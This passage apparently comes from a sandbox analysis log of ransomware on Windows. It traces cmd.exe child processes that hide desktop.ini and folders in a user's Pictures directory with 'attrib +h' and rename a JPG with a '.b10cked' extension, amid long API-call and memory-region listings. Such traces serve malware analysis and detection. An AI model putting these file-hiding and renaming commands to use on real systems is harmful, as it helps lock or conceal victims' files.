nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.256] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.256] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.256] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.257] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.330] _close (_FileHandle=4) returned 0 [0144.331] FindNextFileW (in: hFindFile=0x43e6f0, lpFindFileData=0x2ef100 | out: lpFindFileData=0x2ef100) returned 0 [0144.331] GetLastError () returned 0x12 [0144.331] FindClose (in: hFindFile=0x43e6f0 | out: hFindFile=0x43e6f0) returned 1 [0144.331] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0144.335] _close (_FileHandle=3) returned 0 [0144.335] GetConsoleTitleW (in: lpConsoleTitle=0x2ef538, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0144.335] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0144.335] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0144.335] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: 
lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0144.335] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x2eedd4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eedd4) returned 0xffffffff [0144.336] GetLastError () returned 0x2 [0144.336] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x2eedd4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eedd4) returned 0xffffffff [0144.336] GetLastError () returned 0x2 [0144.336] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x2eedd4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eedd4) returned 0x43e6f0 [0144.336] FindClose (in: hFindFile=0x43e6f0 | out: hFindFile=0x43e6f0) returned 1 [0144.336] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x2eedd4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eedd4) returned 0xffffffff [0144.336] GetLastError () returned 0x2 [0144.336] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x2eedd4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eedd4) returned 0x43e6f0 [0144.336] FindClose (in: hFindFile=0x43e6f0 | out: hFindFile=0x43e6f0) returned 1 [0144.337] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0144.337] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0144.337] GetConsoleTitleW (in: lpConsoleTitle=0x2ef2cc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0144.337] InitializeProcThreadAttributeList (in: lpAttributeList=0x2ef154, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2ef21c | out: lpAttributeList=0x2ef154, lpSize=0x2ef21c) returned 1 
[0144.337] UpdateProcThreadAttribute (in: lpAttributeList=0x2ef154, dwFlags=0x0, Attribute=0x60001, lpValue=0x2ef214, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2ef154, lpPreviousValue=0x0) returned 1 [0144.337] GetStartupInfoW (in: lpStartupInfo=0x2ef110 | out: lpStartupInfo=0x2ef110*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0144.337] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0144.337] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2ef1b0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2ef1fc | out: lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\desktop.ini\" ", lpProcessInformation=0x2ef1fc*(hProcess=0x4c, hThread=0x50, dwProcessId=0x878, dwThreadId=0x808)) returned 1 [0144.339] CloseHandle (hObject=0x50) returned 1 [0144.339] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0144.339] GetEnvironmentStringsW () returned 0x442e20* [0144.339] FreeEnvironmentStringsW (penv=0x442e20) returned 1 [0144.339] WaitForSingleObject (hHandle=0x4c, 
dwMilliseconds=0xffffffff) returned 0x0 [0144.399] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x2ef0f0 | out: lpExitCode=0x2ef0f0*=0x0) returned 1 [0144.399] CloseHandle (hObject=0x4c) returned 1 [0144.399] _vsnwprintf (in: _Buffer=0x2ef238, _BufferCount=0x13, _Format="%08X", _ArgList=0x2ef0fc | out: _Buffer="00000000") returned 8 [0144.399] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0144.399] GetEnvironmentStringsW () returned 0x442e20* [0144.399] FreeEnvironmentStringsW (penv=0x442e20) returned 1 [0144.399] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0144.399] GetEnvironmentStringsW () returned 0x442e20* [0144.399] FreeEnvironmentStringsW (penv=0x442e20) returned 1 [0144.399] DeleteProcThreadAttributeList (in: lpAttributeList=0x2ef154 | out: lpAttributeList=0x2ef154) [0144.399] GetConsoleTitleW (in: lpConsoleTitle=0x2ef538, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0144.400] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0144.400] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0144.400] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0144.400] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x2eedd4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eedd4) returned 0xffffffff [0144.400] GetLastError () returned 0x2 [0144.400] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x2eedd4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eedd4) returned 0xffffffff [0144.400] 
GetLastError () returned 0x2 [0144.400] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x2eedd4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eedd4) returned 0x43e6f0 [0144.401] FindClose (in: hFindFile=0x43e6f0 | out: hFindFile=0x43e6f0) returned 1 [0144.401] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x2eedd4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eedd4) returned 0xffffffff [0144.401] GetLastError () returned 0x2 [0144.401] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x2eedd4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eedd4) returned 0x43e6f0 [0144.401] FindClose (in: hFindFile=0x43e6f0 | out: hFindFile=0x43e6f0) returned 1 [0144.401] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0144.401] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0144.401] GetConsoleTitleW (in: lpConsoleTitle=0x2ef2cc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0144.401] InitializeProcThreadAttributeList (in: lpAttributeList=0x2ef154, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2ef21c | out: lpAttributeList=0x2ef154, lpSize=0x2ef21c) returned 1 [0144.401] UpdateProcThreadAttribute (in: lpAttributeList=0x2ef154, dwFlags=0x0, Attribute=0x60001, lpValue=0x2ef214, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2ef154, lpPreviousValue=0x0) returned 1 [0144.401] GetStartupInfoW (in: lpStartupInfo=0x2ef110 | out: lpStartupInfo=0x2ef110*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, 
hStdOutput=0x0, hStdError=0x1000000)) [0144.401] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0144.401] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2ef1b0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2ef1fc | out: lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\"", lpProcessInformation=0x2ef1fc*(hProcess=0x50, hThread=0x4c, dwProcessId=0x974, dwThreadId=0x838)) returned 1 [0144.403] CloseHandle (hObject=0x4c) returned 1 [0144.403] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0144.404] GetEnvironmentStringsW () returned 0x443850* [0144.404] FreeEnvironmentStringsW (penv=0x443850) returned 1 [0144.404] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0144.481] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x2ef0f0 | out: lpExitCode=0x2ef0f0*=0x0) returned 1 [0144.481] CloseHandle (hObject=0x50) returned 1 [0144.481] _vsnwprintf (in: _Buffer=0x2ef238, _BufferCount=0x13, _Format="%08X", _ArgList=0x2ef0fc | out: _Buffer="00000000") returned 8 [0144.481] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0144.481] GetEnvironmentStringsW () returned 0x443850* [0144.481] FreeEnvironmentStringsW (penv=0x443850) returned 1 [0144.481] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0144.481] GetEnvironmentStringsW 
() returned 0x443850* [0144.481] FreeEnvironmentStringsW (penv=0x443850) returned 1 [0144.481] DeleteProcThreadAttributeList (in: lpAttributeList=0x2ef154 | out: lpAttributeList=0x2ef154) [0144.481] _get_osfhandle (_FileHandle=1) returned 0x7 [0144.481] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0144.481] _get_osfhandle (_FileHandle=1) returned 0x7 [0144.481] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0144.482] _get_osfhandle (_FileHandle=0) returned 0x3 [0144.482] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0144.482] SetConsoleInputExeNameW () returned 0x1 [0144.482] GetConsoleOutputCP () returned 0x1b5 [0144.482] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0144.482] SetThreadUILanguage (LangId=0x0) returned 0x409 [0144.482] exit (_Code=0) Process: id = "188" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16ae0" os_pid = "0x140" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\KYWWKR~1.JPG\" \"C:\\Users\\EEBsYm5\\Pictures\\kYWWkRklabLUzyrJ9.jpg.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 16641 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 16642 start_va = 0x30000 end_va = 
0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 16643 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 16644 start_va = 0xb0000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 16645 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 16646 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 16647 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 16648 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 16649 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 16650 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 16715 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 16716 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 16717 start_va = 0x1b0000 end_va = 0x216fff entry_point = 0x1b0000 region_type = mapped_file name = "locale.nls" filename 
= "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 16718 start_va = 0x320000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 16719 start_va = 0x600000 end_va = 0x60ffff entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 16720 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 16721 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 16722 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 16723 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 16724 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 16725 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 16726 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 16727 
start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 16728 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 16729 start_va = 0x220000 end_va = 0x2e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 16730 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 16731 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 16732 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 16733 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 16734 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 16735 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 16736 start_va = 0x420000 end_va = 0x520fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 16737 start_va = 0x610000 end_va = 0x120ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16738 start_va = 0x1210000 end_va = 0x1372fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000001210000" filename = "" Thread: id = 244 os_tid = 0x8c4 [0143.606] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1afd64 | out: lpSystemTimeAsFileTime=0x1afd64*(dwLowDateTime=0x8f868720, dwHighDateTime=0x1d440a9)) [0143.606] GetCurrentProcessId () returned 0x140 [0143.606] GetCurrentThreadId () returned 0x8c4 [0143.606] GetTickCount () returned 0x2cdd9 [0143.606] QueryPerformanceCounter (in: lpPerformanceCount=0x1afd5c | out: lpPerformanceCount=0x1afd5c*=20039505343) returned 1 [0143.606] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0143.606] __set_app_type (_Type=0x1) [0143.606] __p__fmode () returned 0x76b331f4 [0143.606] __p__commode () returned 0x76b331fc [0143.607] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0143.607] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0143.607] GetCurrentThreadId () returned 0x8c4 [0143.607] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x8c4) returned 0x38 [0143.607] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0143.607] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0143.607] SetThreadUILanguage (LangId=0x0) returned 0x409 [0143.607] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0143.607] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1afcf4 | out: phkResult=0x1afcf4*=0x0) returned 0x2 [0143.607] VirtualQuery (in: lpAddress=0x1afd2b, lpBuffer=0x1afcc4, dwLength=0x1c | out: lpBuffer=0x1afcc4*(BaseAddress=0x1af000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.607] VirtualQuery (in: 
lpAddress=0xb0000, lpBuffer=0x1afcc4, dwLength=0x1c | out: lpBuffer=0x1afcc4*(BaseAddress=0xb0000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0143.607] VirtualQuery (in: lpAddress=0xb1000, lpBuffer=0x1afcc4, dwLength=0x1c | out: lpBuffer=0x1afcc4*(BaseAddress=0xb1000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0143.607] VirtualQuery (in: lpAddress=0xb3000, lpBuffer=0x1afcc4, dwLength=0x1c | out: lpBuffer=0x1afcc4*(BaseAddress=0xb3000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.607] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x1afcc4, dwLength=0x1c | out: lpBuffer=0x1afcc4*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0143.607] GetConsoleOutputCP () returned 0x1b5 [0143.608] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0143.608] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0143.608] _get_osfhandle (_FileHandle=1) returned 0x7 [0143.608] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0143.608] _get_osfhandle (_FileHandle=1) returned 0x7 [0143.608] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0143.608] _get_osfhandle (_FileHandle=1) returned 0x7 [0143.608] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0143.608] _get_osfhandle (_FileHandle=0) returned 0x3 [0143.608] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0143.608] _get_osfhandle (_FileHandle=0) returned 0x3 [0143.608] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0143.609] GetEnvironmentStringsW () returned 0x330180* [0143.609] FreeEnvironmentStringsW 
(penv=0x330180) returned 1 [0143.609] GetEnvironmentStringsW () returned 0x330180* [0143.609] FreeEnvironmentStringsW (penv=0x330180) returned 1 [0143.609] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1aec64 | out: phkResult=0x1aec64*=0x40) returned 0x0 [0143.609] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1aec6c, lpData=0x1aec70, lpcbData=0x1aec68*=0x1000 | out: lpType=0x1aec6c*=0x0, lpData=0x1aec70*=0xa8, lpcbData=0x1aec68*=0x1000) returned 0x2 [0143.609] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1aec6c, lpData=0x1aec70, lpcbData=0x1aec68*=0x1000 | out: lpType=0x1aec6c*=0x4, lpData=0x1aec70*=0x1, lpcbData=0x1aec68*=0x4) returned 0x0 [0143.609] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1aec6c, lpData=0x1aec70, lpcbData=0x1aec68*=0x1000 | out: lpType=0x1aec6c*=0x0, lpData=0x1aec70*=0x1, lpcbData=0x1aec68*=0x1000) returned 0x2 [0143.609] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1aec6c, lpData=0x1aec70, lpcbData=0x1aec68*=0x1000 | out: lpType=0x1aec6c*=0x4, lpData=0x1aec70*=0x0, lpcbData=0x1aec68*=0x4) returned 0x0 [0143.609] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1aec6c, lpData=0x1aec70, lpcbData=0x1aec68*=0x1000 | out: lpType=0x1aec6c*=0x4, lpData=0x1aec70*=0x40, lpcbData=0x1aec68*=0x4) returned 0x0 [0143.609] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1aec6c, lpData=0x1aec70, lpcbData=0x1aec68*=0x1000 | out: lpType=0x1aec6c*=0x4, lpData=0x1aec70*=0x40, lpcbData=0x1aec68*=0x4) returned 0x0 [0143.609] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1aec6c, lpData=0x1aec70, lpcbData=0x1aec68*=0x1000 | out: lpType=0x1aec6c*=0x0, lpData=0x1aec70*=0x40, 
